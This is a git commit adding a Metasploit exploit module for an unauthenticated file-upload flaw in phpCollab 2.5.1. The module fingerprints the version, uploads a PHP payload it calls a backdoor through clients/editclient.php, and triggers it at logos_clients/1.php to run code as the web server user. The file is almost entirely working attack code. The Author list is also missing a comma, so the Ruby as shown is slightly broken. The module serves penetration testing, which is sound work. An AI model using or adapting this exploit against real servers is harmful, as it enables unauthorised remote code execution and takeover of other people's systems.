Add phpCollab 2.5.1 exploit module

2017-12-20 08:36:58 -05:00 · 2017-12-20 08:36:58 -05:00 · 139afe45a9
parent 880a1d4283
commit 139afe45a9
1 changed files with 92 additions and 0 deletions
--- a/modules/exploits/unix/webapp/phpcollab_upload_exec.rb
+++ b/modules/exploits/unix/webapp/phpcollab_upload_exec.rb
@ -0,0 +1,92 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'phpCollab 2.5.1 Unauthenticated File Upload Vulnerability',
+      'Description'    => %q{
+          This module exploits a file upload vulnerability in phpCollab 2.5.1 
+        which could be abused to allow unauthenticated users to execute arbitrary code
+        under the context of the web server user.
+
+        The exploit has been tested on Ubuntu 16.04.3 64-bit
+      },
+      'Author'         =>
+        [
+          'Nicolas SERRA <n.serra[at]sysdream.com>' # Vulnerability discovery 
+          'Nick Marcoccio "1oopho1e" <iremembermodems[at]gmail.com>' # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'URL', 'https://www.exploit-db.com/exploits/42934/' ],
+        ],
+      'Privileged'     => false,
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Payload'        =>
+        {
+          'DisableNops' => true
+        },
+      'Targets'        => [ ['Automatic', {}] ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Sep 29 2017'
+      ))
+
+      register_options(
+        [
+          OptString.new('TARGETURI', [ true, "Installed path of phpCollab ", "/phpcollab/"])
+        ])
+  end
+
+  def check
+    url = normalize_uri(target_uri.path, "general/login.php?msg=logout")
+    res = send_request_cgi(
+        'method'  => 'GET',
+        'uri'     =>  url
+    )
+
+    if res && res.body.include?('PhpCollab v2.5.1') 
+      return Exploit::CheckCode::Appears
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    filename = '1.php'
+    register_file_for_cleanup(filename)
+
+    data = Rex::MIME::Message.new
+    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"upload\"; filename=\"#{filename}\"")
+
+    print_status("Uploading backdoor file: #{filename}")
+
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path, "clients/editclient.php?id=1&action=update"),
+      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
+      'data'     => data.to_s
+     })
+
+    if res && res.code == 302 
+      print_good("Backdoor successfully created.")
+    else
+      fail_with(Failure::Unknown, "#{peer} - Error on uploading file")
+    end
+
+    print_status("Trigging the exploit...")
+    send_request_cgi({
+      'method'  => 'GET',
+      'uri'     => normalize_uri(target_uri.path, "logos_clients/1.php")
+     }, 5)
+  end
+end